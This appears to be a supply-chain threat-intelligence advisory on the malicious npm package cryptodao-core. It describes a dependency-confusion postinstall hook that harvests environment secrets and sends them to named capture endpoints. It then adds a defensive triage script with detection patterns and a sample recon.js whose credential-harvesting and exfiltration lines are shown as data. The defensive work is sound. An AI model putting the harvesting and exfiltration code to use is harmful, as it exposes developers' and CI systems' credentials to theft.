Supply-chain threat intelligence

Incident detail

critical · npm · dependency confusion · osv

Malicious code in cryptodao-core (npm)

cryptodao-core

Risk score

92

AI summary

Indexed incident for cryptodao-core (npm).

Description

package.json declares a postinstall hook that runs recon.js on every npm install. recon.js harvests installer-side secrets from the environment (AWS_SECRET_ACCESS_KEY, SSH_PRIVATE_KEY, NPM_TOKEN, GITLAB_ACCESS_TOKEN, DB_PASSWORD, MNEMONIC and similar), reads .env files from multiple paths, enumerates CI runner directories (/builds/, /home/gitlab-runner/) and collects host fingerprint data (hostname, platform, user, cwd).

The bundle is POSTed over HTTPS with TLS verification disabled (rejectUnauthorized: false), so the upload also succeeds behind a TLS-intercepting egress proxy, to two anonymous request-capture endpoints: webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and enqoojbegdvxj.x.pipedream.net. A copy is also dropped to /tmp/.npm_recon_.json, which is the host-side artifact to look for when checking whether a machine actually ran the payload.

The package name 'cryptodao-core', the version 99.99.99 and the in-source comment 'CryptoDAO Dependency Confusion Reconnaissance Payload' are the canonical dependency-confusion attack shape: a public package published at an absurd version so that it outranks an internal package of the same name on resolvers that consult both public and private registries. Any CI runner or developer machine that installs this version leaks its environment secrets to attacker-controlled endpoints; credentials present in the environment of the installing process should be treated as exposed and rotated.
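As an added example (not ThreatPkg's code and not the contents of cryptodao-core), the Node.js script below triages an unpacked package for the shape described above: install lifecycle hooks, an absurd version number, reads of secret environment variables, .env reads, CI-directory enumeration, host fingerprinting, rejectUnauthorized: false, and known request-capture hosts. It also checks an .npmrc for the two controls that defeat this incident class on the defender side: an internal scope pinned to a private registry, and ignore-scripts=true. The rule names, the major-version threshold, the capture-host list, the sample package.json and recon.js text, and the .npmrc lines are all constructed assumptions for the demonstration.

```javascript
'use strict';
// Added triage script (not ThreatPkg's or cryptodao-core's code). Runs offline
// over an unpacked package's package.json and source text and flags the
// dependency-confusion recon shape described in the incident. Rule names,
// the version threshold and the capture-host list are assumptions.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const ABSURD_MAJOR = 90; // assumption: no legitimate package sits at major >= 90
const EXFIL_HOST_RE = /\b(?:[a-z0-9-]+\.)?(webhook\.site|pipedream\.net|requestbin\.com)\b/i;
const SECRET_ENV_RE = /\b(AWS_SECRET_ACCESS_KEY|SSH_PRIVATE_KEY|NPM_TOKEN|GITLAB_ACCESS_TOKEN|DB_PASSWORD|MNEMONIC)\b/;
const DOTENV_READ_RE = /readFile(?:Sync)?\([^)]*\.env\b/;
const CI_DIR_RE = /\/builds\/|\/home\/gitlab-runner\//;
const FINGERPRINT_RE = /os\.(?:hostname|platform|userInfo)\(\)|process\.cwd\(\)/;
const TLS_OFF_RE = /rejectUnauthorized\s*:\s*false/;

// pkg: parsed package.json; files: { relativePath: sourceText }. Heuristic text
// matching: a finding is a reason to look, not a conviction on its own.
function triagePackage(pkg, files) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ rule: 'install-hook', where: `scripts.${hook}`, detail: scripts[hook] });
  }
  const major = Number(String(pkg.version || '').split('.')[0]);
  if (Number.isInteger(major) && major >= ABSURD_MAJOR) {
    findings.push({ rule: 'absurd-version', where: 'version', detail: pkg.version });
  }
  for (const [path, src] of Object.entries(files)) {
    const hit = (rule, re) => {
      const m = src.match(re);
      if (m) findings.push({ rule, where: path, detail: m[0] });
    };
    hit('secret-env-read', SECRET_ENV_RE);
    hit('dotenv-read', DOTENV_READ_RE);
    hit('ci-dir-enumeration', CI_DIR_RE);
    hit('host-fingerprint', FINGERPRINT_RE);
    hit('tls-verify-disabled', TLS_OFF_RE);
    hit('exfil-endpoint', EXFIL_HOST_RE);
  }
  return findings;
}

// Install-time execution + credential harvesting + an exfil channel is the full chain.
function verdict(findings) {
  const rules = new Set(findings.map(f => f.rule));
  const harvest = rules.has('secret-env-read') || rules.has('dotenv-read');
  const exfil = rules.has('exfil-endpoint') || rules.has('tls-verify-disabled');
  if (rules.has('install-hook') && harvest && exfil) return 'critical';
  if (rules.has('install-hook') && (harvest || exfil)) return 'high';
  return rules.size ? 'review' : 'clean';
}

// Defender-side check of an .npmrc: is the organisation's internal scope pinned
// to a private registry (so a public package of the same name cannot win), and
// are lifecycle scripts disabled (so a postinstall hook never runs)?
function npmrcHardening(npmrcText, scope) {
  const lines = npmrcText.split(/\r?\n/).map(l => l.trim()).filter(l => l && !l.startsWith('#'));
  const get = key => {
    const line = lines.find(l => l.startsWith(key + '='));
    return line ? line.slice(key.length + 1).trim() : undefined;
  };
  return {
    scopedRegistry: /^https:\/\//.test(get(`${scope}:registry`) || ''),
    ignoreScripts: get('ignore-scripts') === 'true',
  };
}

// Constructed sample inputs that mimic the described shape; not the real package contents.
const SAMPLE_PKG = { name: 'cryptodao-core', version: '99.99.99', scripts: { postinstall: 'node recon.js' } };
const SAMPLE_FILES = {
  'recon.js': [
    "const os = require('os'), fs = require('fs'), https = require('https');",
    "const loot = { host: os.hostname(), npm: process.env.NPM_TOKEN, aws: process.env.AWS_SECRET_ACCESS_KEY };",
    "try { loot.dotenv = fs.readFileSync('.env', 'utf8'); } catch (e) {}",
    "const req = https.request({ host: 'example.webhook.site', method: 'POST', rejectUnauthorized: false });",
  ].join('\n'),
  'index.js': 'module.exports = {};',
};

if (typeof require !== 'undefined' && require.main === module) {
  const findings = triagePackage(SAMPLE_PKG, SAMPLE_FILES);
  for (const f of findings) console.log(f.rule.padEnd(20), f.where.padEnd(18), f.detail);
  console.log('verdict:', verdict(findings));
  console.log('npmrc:', npmrcHardening('@cryptodao:registry=https://npm.internal.example/\nignore-scripts=true\n', '@cryptodao'));
}
```

To run it against a real candidate, fetch the tarball with `npm pack <name>@<version>` (which does not execute lifecycle scripts), extract it, and feed the parsed package.json and the file contents to triagePackage. Note that ignore-scripts=true also blocks legitimate build steps that some packages need, so in practice it is paired with a scoped private registry for internal names rather than used alone.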

Technical details

Affected versions

=99.99.99

Indicators

  • affected version = 99.99.99 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents